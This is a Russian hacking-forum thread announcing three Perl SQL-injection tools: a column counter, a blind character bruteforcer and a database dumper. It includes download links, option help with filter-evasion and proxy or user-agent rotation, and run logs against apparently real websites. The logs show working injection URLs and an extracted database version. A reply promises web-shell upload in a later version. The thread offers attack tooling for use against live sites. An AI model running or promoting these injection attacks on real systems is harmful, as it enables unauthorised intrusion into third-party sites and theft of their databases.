Форум АНТИЧАТ - Antichat SQL-tools

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Избранное (https://forum.antichat.xyz/forumdisplay.php?f=89)

- - Antichat SQL-tools (https://forum.antichat.xyz/showthread.php?t=28461)

Antichat SQL-tools

Antichat SQL-tools for check columns v.1.1.1
Скрипт для подбора числа столбцов в БД.

Основная функция:
- подбор числа столбцов

Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение необходимых параметров
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода и алгоритмов
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.7(30.09.2006) - оптимизация кода
v1.0.6(17.07.2006) - фикс: переработан механизм перебора для GROUP и ORDER, что уменьшает число запросов + экономит трафик.
v1.0.5(31.08.2006) - новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: на выбор три типа перебора - union, group by и order by(Greets ZaCo)
- новое: добавил getopts. Теперь удобно указывать параметры
- новое: возможность указать начальное и конечное число столбцов.
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: что подставлять в столбцы - цифры или null'ы
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
- новое: защита от дурака + хелп
v1.0.1 - новое: автовыход при найденных столбцах(ориентир - по отсутствию указанной вами ошибке)
v1.0.0(19.06.2006) - Увидел cкрипт Форба(10 строк). Появилось желание доработать.

Скачать: http://sec-123.narod.ru/public/sql_check_public.rar

Выдержка из хелпа:

Код:

   Options:

 -u - путь к сайту с уязвимым скриптом, например http://site.com/index.php?user=-1'))

 -a - строка с ошибкой неправильного числа столбцов, по её отсутствию в верном запросе определяется конец перебора

 -n - с какого столбца начнём брут?

 -N - до какакого столбца будем брутить?

 -m - способ подбора: UNION SELECT, GROUP BY, ORDER BY. Быстрее работает group и order, но надёжнее union.

 -s - разделитель между операторами. Иногда пробел фильтруецца - юзаем многочисленные его альтернативы.

 -z - столбцы при union-методе можно перечислять цифрами(1,2,3..), а можно нулами(null)

 -c - комменты в конце выражения. Для mysql характерно "/*" , а для mssql "--" 

 -g - работа через гет или пост-запросы

 -t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10

 -b - юзер-агент. выбирается случайный юзер-агент при каждом запросе

 -p - файл с проксями. выбирается случайная прокся при каждом запросе

 -l - логирование работы в файл

Код:

C:\sql-check.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"

Лог работы:

Код:

=========_Script_Brut_Columns_========

 

*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004

 Evristic:______ON

 Min_colomns:___1

 Max_colomns:___50

 Metod:_________UNION

 SPACE:_________%20

 NULL:__________1

 POST-GET:______GET

 Time(sleep):___0

 User-Agent:____useragent.txt

 PROXY:_________proxy.txt

 Log:___________log.txt



=========_Script_Brut_Columns_========



GO!



Start evristic detection.

 Please, WAIT...





Detect MySQL



Start UNION

Please Wait...



 Try 1 column... NOT FOUND =( 

 Try 2 column... NOT FOUND =( 

 Try 3 column... NOT FOUND =( 

 Try 4 column... NOT FOUND =( 

 Try 5 column... NOT FOUND =( 

 Try 6 column... NOT FOUND =( 

 Try 7 column... NOT FOUND =( 

 Try 8 column... NOT FOUND =( 

 Try 9 column... NOT FOUND =( 

 Try 10 column... NOT FOUND =( 

 Try 11 column... 

 ------------------------



 OK!  Find 11 columns. 



 Right URL:

 http://www.comstar.ru/press-center/news/?month=10&year=2004%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11/*

Код:

=========_Script_Brut_Columns_========

 

*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004

 Evristic:______ON

 Min_colomns:___1

 Max_colomns:___50

 Metod:_________GROUP

 SPACE:_________%20

 NULL:__________1

 POST-GET:______GET

 Time(sleep):___0

 User-Agent:____useragent.txt

 PROXY:_________proxy.txt

 Log:___________log.txt



=========_Script_Brut_Columns_========



GO!



Start evristic detection.

 Please, WAIT...





Detect MySQL



Start GROUP

Please Wait...



 Try 25 column...  ok!

 Try 13 column...  ok!

 Try 7 column...  no...

 Try 10 column...  no...

 Try 10 column...  ok!

 Try 11 column...  ok!

 Try 12 column... 



------------------------



 OK! Find 11 columns. 



 Right URL:

 http://www.comstar.ru/press-center/news/?month=10&year=2004%20GROUP%20BY%2012/*

Antichat SQL-tools for one_simvol_brut_columns v.1.1.1

Antichat SQL-tools for one_simvol_brut_columns v.1.1.1
Скрипт для посимвольного перебора записей в БД.

Основная функция:
- посимвольный подбор целевого значения записи в БД

Обращаю ваше внимание, что консольная и GUI одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение положительного ответа, длинны целевой записи
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - произведено разделение потока вывода в лог и консоль.
(Это сделано для того, чтобы при посимвольном бруте файла через load_file() информационный мусор не попадал в лог)
- пресеты ascii - на выбор
- новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода. улучшение алгоритмов перебора для минимального кол-ва запросов.
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
v1.0.7(30.09.2006) - фикс: исправил критическую ошибку в модуле определения длинны.
(Обозвал функцию "lenght" вместо "length". Да, бывает. Сорри.)
v1.0.6(17.07.2006) - новое: улучшил алгоритм перебора - экономия трафика
v1.0.5(31.08.2006) - новое: авто-определение длины перебираемой записи
- новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: добавил getopts. Теперь удобно указывать параметры
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: защита от дурака + хелп
- новое: возможность указать начальную и конечную позицию записи
v1.0.1 - новое: автоматический брут всей записи (ранее подбирал только указанный символ)
v1.0.0(19.06.2006) - Раскопал скрипт от rst(r57sql_ocb.pl). Появилось желание доработать.

Скачать: http://sec-123.narod.ru/public/sql_ocb_public.rar

Выдержка из хелпа:

Код:

   Options:

 -u - путь к сайту с уязвимым скриптом

 -s - подзапрос к бд. Например, "version()" или "(select user from mysql.user)"

 -a - строка, присутствующая в ответе, если условие 1=1 и отсутствует, когда 1=2 ; При указании "AUTO" будет определена самостоятельно

 -m - наборы символов ascii: 0-все, 1-мд5, 2-цифры, 3-англ.буквы, 4-рус.буквы

 -L - автоопределение длинны строки. Удобно при бруте строк рэндомных длинн. 

     0-выход при первой ошибке(рекомендую все ascii, тогда выход при конце строки)

     1-задаём нужную длинну строки через n и N. Все не найденные ascii обозначаться "*"

     2-включаем автоопределение длинны строки. Все не найденные ascii обозначаться "*"

 -n - (только для L=1)позиция первого символа в строке, с которого начнём брут

 -N - (только для L=1)позиция последнего символа в строке, на котором закончим брут

 -S - вид пробела: "%20","+","%2B","/**/","%09","%0D","$IFS" 

 -c - вид коментов: "/*","--","#"

 -g - работа через гет или пост-запросы

 -t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10

 -b - юзер-агент. выбирается случайный юзер-агент при каждом запросе

 -p - файл с проксями. выбирается случайная прокся при каждом запросе

 -l - логирование(лог адаптирован под брут файлов: фразы типа "-> Try 48 .." не пишутся - только сам результат )

Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! В GUI версии используется кодировка "use encoding 'cp1251';". Она была подключена ради поддержки русского gui-хелпа.
При использовании посимвольного брута Вы можете иметь проблемы с неподбираемыми русскими буквами, поскольку ascii-коды в скрипте будут в cp1251, а на сервере в utf-8.
Для устранения глюка просто закоментруйте подключенную кодировку: "# use encoding 'cp1251';"

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Внимание! Выяснена особенность перла, имеющая неприятные последствия.
При глубине вложения процедур более одной, вывод текста в консоль происходит, если выполняется хотя бы одно условие:
- выход из процедуры в тело самой первой процедуры или основной программы;
- использование при выводе символа переноса строки: "\n"
Поскольку структура моих скриптов имеет высокую степень вложений при выполнении, и иногда требуется не выполнять перенос строки, то вывод данных в консоль может быть задержан.
В любом случае в лог-файл данные попадают БЕЗ задержек, поэтому даже если вы кикнули якобы подвисший скрипт - проверьте лог-файл.
Как пример - при посимвольном бруте содержимого файла вывод в консоль будет осуществляться только при переходе на следующую строку в файле, НО в лог-файл будет записан каждый символ.

Протестить на сайте:

Код:

C:\sql_ocb.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"

Лог работы:

Код:

=====_Sql-Databases One Char Bruteforce Tool_=====



*URL:__________http://www.comstar.ru/press-center/news/?month=10&year=2004 

 substring():__version() 

 Answer_true:__AUTO 

 Ascii:________all

 Lenght:_______first-error 

 Min_num:______1 

 Max_num:______10 

 SPACE:________%20 

 Comment:______/* 

 POST-GET:_____GET 

 Time(sleep):__0 

 User-Agent:___useragent.txt 

 PROXY:________proxy.txt 

 Log:__________log_ocb.txt 



=====_Sql-Databases One Char Bruteforce Tool_=====



GO!



 Auto-Detect Answer. Please, WAIT...



 OK! Answer: Dial



 Brut string "version()":



4.1.1-alpha-standard-log



-----------------------------------

 Result brut(char): 4.1.1-alpha-standard-log

 Result brut(ascii): 52,46,49,46,49,45,97,108,112,104,97,45,115,116,97,110,100,97,114,100,45,108,111,103,





      Work finished! EXIT.

Antichat Databases_Dumper_MSSQL(MySQL-5.*) v.1.1.1

Antichat Databases_Dumper_MSSQL(MySQL-5.*) v.1.1.1
Скрипт для дампинга базы mssql, mysql-5.*

Основная функция:
- автоматический частичный\полный дампинг БД (mssql, mysql-5.*)

Скрипт предназначен для автоматического дампа БД, используя sql-инъекцию в запросе на основе системных таблиц "INFORMATION_SCHEMA".
Поддерживаются MSSQL и MySQL.v.5.*.

Когда мы стречаемся с sql-inj в MSSQL приходится искать нужные нам столбцы и таблицы, строить запрос. Хуже, если нужно сдампить всю базу, или просмотреть структуру, а результат каждого запроса - только ОДНА запись. Это самый тяжёлый и нудный случай, и скрипт сущесственно облегчает рутиную работу.

- ВНИМАНИЕ! Включени автодампа и произвольного запроса недопустимо!

- всего предусмотрено три алгоритма автодампа: только скелет таблиц, скелет таблиц и столбцов, полный дамп(данные).

- есть возможность задать произвольный запрос(-Z 1).
(внимание: -Z либо не задан, либо равен 1)
При произвольном запросе производится полный дамп данных. Если столбец не указан - дампится вся указанная таблица.
Условие WHERE при неуказанном столбце выполняет поиск желаемых столбцов. При указанном столбце WHERE производит поиск желаемых данных.

- вы можете при необходимости задать лимит, выбрать желаемый метод отрицания, указать тип шифрования.

Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(19.10.2006) - новое: GUI-интерфейс!
- фикс: Win\Nix-совместимость
v1.0.9(19.10.2006) - новое: режим посимвольного брута. Специально для хакеров-камикадзе =)Пакуйте сухари, к Вам уже едут!!!
Автоопределение верного ответа, пресеты ascii.
Автоопределение длины записи не стал встраивать - имхо совсем не нужно оно тут. Это лишние запросы.
v1.0.8(18.10.2006) - новое: эвристическое определение необходимых параметров
Очень полезный модуль. Определяет тип БД, кол-во столбцов UNION, рабочий столбец и его атрибуты
v1.0.7(17.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
v1.0.6(16.10.2006) - новое: добавил convert(mysql) для столбцов
v1.0.5(15.10.2006) - новое: добавил AES_ENCRYPT шифрование столбцов
v1.0.4(14.10.2006) - мелкая оптимизация, правка багов, автоматизация
v1.0.3(12.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.2(11.10.2006) - новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
v1.0.1(10.10.2006) - новое: защита от дурака + хелп
v1.0.0(24.08.2006) - надоело. НАДОЕЛО! это пиздец какой-то дампить бд вручную
- новое: дамп БД: только структура таблиц, структура таблиц и столбцов
- новое: полный дамп БД в указанным вами запросе
- новое: поддержка mysql,mssql и характерного для них синтаксиса
- новое: два вида отрицания: "NOT IN" и "<>"
- новое: шифрование переменных в hex и char
- новое: работа пост или гет запросом
- новое: поддержка прокси
- новое: логирование в файл

Скачать: http://sec-123.narod.ru/public/sql_dump_public.rar

Выдержка из хелпа:

Код:

   Options:  *-необходимый параметр

*-u - путь к сайту с уязвимым скриптом "http://site.com/?bag=-1'"

 -W - юзаем юнион(-W=0) или подзапрос(-W=1)

 -A - алгоритм без доп.условия where:

   "1" - сдампить только названия таблиц без столбцов и данных

   "2" - сдампить только названия таблиц и столбцов без данных

   "3" - полный дамп базы.

 -Z - выдрать данные из конкретной таблицы,столбца. Дампит полностью, игнорируя -A

   -t - выдрать только из указанной таблицы

   -с - выдрать только из указанного столбца таблицы

   -w - доп.условие where

 -E - эвристическое определение всех ниже лежащих подпараметров. 

   -M - 0="MSSQL"(default); 1="MySQL"

   -C - вид комента. 0="/*",1="--",2="#"

   -O - all column in SELECT (default=1)

   -o - work column in SELECT (default=1)

   -s - строка\символы до полезного параметра

   -S - строка\символы после полезного параметра

   -m - TOP(mssql) или LIMIT(mysql-5.*)

     -n - параметр TOP или первый параметр LIMIT

     -N - второй параметр LIMIT. при отсутствии равен n

   -z - конвертирование cp1251 или latin1

   -a - шифрование имён столбцов в AES_ENCRYPT(AES_DECRYPT(TABLE_NAME,0x71,0x71))

 -B - режим посимвольного брута.( Элект, ТЫ ПСИХ!! )

   -s - строка в правильном запросе(AND 1=1)

   -i - пресеты ascii-перебора. По дефолту - все символы

   -L - по умолчанию выход при первой ошибке, что при юзании всех ascii означает конец строки

     -v - с какой позиции начать перебор неизвестной(по дефолту с первой)

     -V - на какой позиции закончить(по дефолту на 10-й)

 -f - задаёт отрицание: 'NOT IN' либо '<>'

 -h - шифрование переменных в HEX, CHAR

 -r - вид пробела. SPACE(%20)=0(def);'+'=1;%2B=2;/**/=3;TAB(%09)=4;%0D=5;\$IFS=6

 -g - работа через гет или пост-запросы

 -T - время задержки. 'RAND'-рэндомное от 1 до 10 сек

 -b - файл со списком юзер-агентов. рэндомный выбор

 -p - файл с проксями. рэндомный выбор

 -l - логирование в указанный файл

Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! В GUI версии используется кодировка "use encoding 'cp1251';". Она была подключена ради поддержки русского gui-хелпа.
При использовании посимвольного брута Вы можете иметь проблемы с неподбираемыми русскими буквами, поскольку ascii-коды в скрипте будут в cp1251, а на сервере в utf-8.
Для устранения глюка просто закоментруйте подключенную кодировку: "# use encoding 'cp1251';"

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Внимание! Выяснена особенность перла, имеющая неприятные последствия.
При глубине вложения процедур более одной, вывод текста в консоль происходит, если выполняется хотя бы одно условие:
- выход из процедуры в тело самой первой процедуры или основной программы;
- использование при выводе символа переноса строки: "\n"
Поскольку структура моих скриптов имеет высокую степень вложений при выполнении, и иногда требуется не выполнять перенос строки, то вывод данных в консоль может быть задержан.
В любом случае в лог-файл данные попадают БЕЗ задержек, поэтому даже если вы кикнули якобы подвисший скрипт - проверьте лог-файл.
Как пример - вывод данных из столбца осуществляется в строку без "\n" и пока не будут найдены все данные в столбце - они не отобразяться в консоли, но прологируться.

Протестить на сайте:

Код:

C:\>C:\mssql_base_dump.pl -u "http://www.onlineticketshop.nl/content/details.asp?sub_id=556&taal_id=(" -W 1

Лог работы:
Они слишком большие. Прилагаются в аттаче.
http://sec-123.narod.ru/public/basedump_onlyt.txt
http://sec-123.narod.ru/public/basedump_query.txt
http://sec-123.narod.ru/public/basedump_ocb.txt

Сразу скажу, что заявления вроде "почему не ассемблер?.." идут в топку.
Я не борюсь за звание мега-программера и если Вы можете написать это лучше - я за Вас рад.

Тулзы написаны для людей, которым некогда терять своё время и силы на рядовые операции.
============

Серия тулз Antichat SQL-tools v.1.1.1:
- чекер столбцов
- посимвольный брутер
- дампер баз.

GUI - путь к пониманию.
Ну, сейчас это во-первых модно, во вторых очень удобно.
Недолго и запутаться в настройках консольной версии.
ГУИ позволил во многом облегчить понимание процесса: встроенные автоподстройки табов не дадут Вам поставить недопустимые взаимоисключающие параметры.

Эвристический анализатор - "Тефай думает за Вас!"
Что называется - эксплоит для домохозяек.
Создание эвристика позволило ограничиться передачей скрипту ОДНОГО ТОЛЬКО УРЛА!
Я долго возился с ним и могу гарантировать стабильную работу в %50 случаев, каковыми собственно являються стандартные инъекции.
Вообще удивительно, но до сих пор никто не озадачился написать нечто подобное. Может просто лень?
По крайне мере мне не встречался ни один продукт тем разнообразием функций, что мне удалось написать.
Так что думаю не ошибусь, если заявлю об уникальности и лидерстве данных утилит.

Самым сложным(ну и разумеется самым полезным) является Дампер базы. В нём собраны все технологии из двух предыдущих скриптов + только в нём есть полноценный эвристик и ещё некоторые интересные алгоритмы.

=================================

Принимаються конструктивные предложения по идеям\фиксам.

Спасибо за внимание.

У меня тут 2 вопроса:
1) На чём эта тулза написана;
2) Будут ли её исходники;

perl исходники перед тобой

Думпером пользовался для МсСкул, очень классная вешь.

К новому году будет версия SQL inj Tool 2.0 с тем же набором + заливка шелов и сам знаешь с чем :).Реализовано win-exe
Elekt молодца! держи +5

Очень хотелось бы брутеры названий столбцов и колонок по словарю.

Такой скрипт есть. Но только для МОА.